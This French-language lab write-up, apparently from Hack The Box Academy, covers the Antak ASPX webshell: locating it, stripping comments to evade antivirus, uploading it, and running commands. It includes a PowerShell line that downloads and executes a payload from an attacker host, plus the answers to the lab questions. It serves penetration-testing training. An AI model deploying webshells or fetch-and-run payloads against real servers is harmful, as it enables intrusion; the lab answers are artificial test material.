Antak Webshell (ASPX)

🧠 Introduction

Dans le cadre des tests d'intrusion sur des serveurs web Windows, il est fréquent d'utiliser des shells web en ASPX. Avant d'explorer en profondeur l'Antak Webshell, il est utile de rappeler l'intérêt d'une ressource pédagogique complémentaire : le site ippsec.rocks.

Ce site permet de rechercher des concepts précis dans les descriptions de toutes les vidéos publiées par IPPSEC sur YouTube, et de sauter directement à l'instant précis où le sujet est traité. Par exemple, en recherchant le mot-clé aspx, on peut visionner la démonstration sur la machine Cereal à partir de 1h17 jusqu'à 1h20, pour voir un exemple concret d’upload et d’utilisation d’un shell ASPX.

⚙️ Fonctionnement de l’ASPX

ASPX (Active Server Page Extended) est une extension de fichier utilisée par le framework ASP.NET de Microsoft. Elle permet de créer des pages web dynamiques interprétées côté serveur. Lorsqu’un fichier .aspx est placé sur un serveur supportant ASP.NET, ce dernier traite le code, interagit avec le système d’exploitation si nécessaire, puis renvoie le résultat au client sous forme de HTML.

Un shell ASPX exploite cette capacité pour exécuter des commandes sur le serveur cible. Il devient ainsi possible de contrôler une machine Windows à travers le navigateur, si l’on parvient à uploader un fichier malveillant de ce type.

🛠️ Antak Webshell

Antak est un web shell en ASP.NET développé dans le cadre du projet Nishang. Il fonctionne comme une console PowerShell accessible via un navigateur web. Chaque commande est exécutée dans un nouveau processus. Il est également capable d’exécuter des scripts en mémoire, de les encoder, et de gérer des fichiers.

📁 Localisation du shell

Sur Kali Linux (ou tout système disposant de Nishang), les fichiers Antak sont situés ici :

/usr/share/nishang/Antak-WebShell/

Contenu typique :

antak.aspx  Readme.md

✏️ Préparation du shell

Avant l’upload, il est conseillé de :

  • Copier le fichier dans un répertoire de travail :

cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/administrator/Upload.aspx
  • Modifier la ligne 14 pour définir un nom d'utilisateur et un mot de passe d’accès, par exemple :

Cela évite que n'importe qui accède à la webshell une fois uploadée.

  • Supprimer les commentaires et l’ASCII art, souvent utilisés comme signatures par les antivirus.

🚀 Utilisation de Antak

  1. Uploader la webshell sur un serveur vulnérable (par exemple, via un formulaire d’upload).

  2. Naviguer vers le fichier depuis le navigateur (ex : http://status.inlanefreight.local/files/upload.aspx).

  3. Entrer les identifiants configurés précédemment (ex : htb-student / htb-student).

✅ Succès de la connexion

Une fois authentifié, l’interface Antak s’affiche avec une console de type PowerShell.

Fonctionnalités disponibles :

  • Exécution de commandes PowerShell

  • Téléversement et téléchargement de fichiers

  • Encodage et exécution de scripts

  • Analyse du fichier web.config

  • Exécution de requêtes SQL

🖥️ Exemple de commandes

Dans la console Antak, il est possible de :

# Lister les fichiers
Get-ChildItem

# Lire un fichier
Get-Content C:\Users\Public\file.txt

# Télécharger un script et l’exécuter
IEX(New-Object Net.WebClient).DownloadString("http://<IP ATTAQUANT>/payload.ps1")

Le bouton help permet d’afficher les commandes disponibles directement dans l’interface.

🔐 Bonnes pratiques

  • Toujours ajouter une authentification dans la webshell.

  • Éviter de réutiliser le fichier Antak sans le modifier (ASCII art, commentaires).

  • Préférer l’utilisation d’un reverse shell une fois le RCE confirmé, pour obtenir un accès plus stable et interactif.

📚 Ressources utiles


Antak est un excellent point d'entrée pour explorer les webshells sur serveurs Windows. Il offre une interface puissante qui rappelle PowerShell, tout en restant simple à mettre en place et à utiliser.


Where is the Antak webshell located on Pwnbox? Submit the full path. (Format:/path/to/antakwebshell)

Afin de rechercher l'emplacement de Antak sur la Pwnbox, nous utilisons la commande find :

$ find / -name "*antak*" 2>/dev/null

Antak est alors présent dans le chemin suivant :

/usr/share/nishang/Antak-WebShell/antak.aspx

vHosts needed for these questions:

  • status.inlanefreight.local

Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. (Format: ****, 1 space)

Nous devons modifier le fichier /etc/hosts afin de renseigner le nom de domaine lié à notre cible :

echo "10.129.7.62 status.inlanefreight.local" >> /etc/hosts

Nous téléchargeons sur notre cible via la page web présente notre webshell Antak :

Une fois le fichier téléchargé, nous accédons à ce dernier via le lien suivant :

http://status.inlanefreight.local/files\antak.aspx

Une fois l'accès au site effectué, nous nous conenctons avec les identifiants configurée sans antak.aspx :

Une fois la connexion effective, nous pouvons utiliser la commande whoami afin d'obtenir notre nom d'utilisateur :

Nous sommes donc présents en tant que iis apppool\status sur la machine cible.


Mis à jour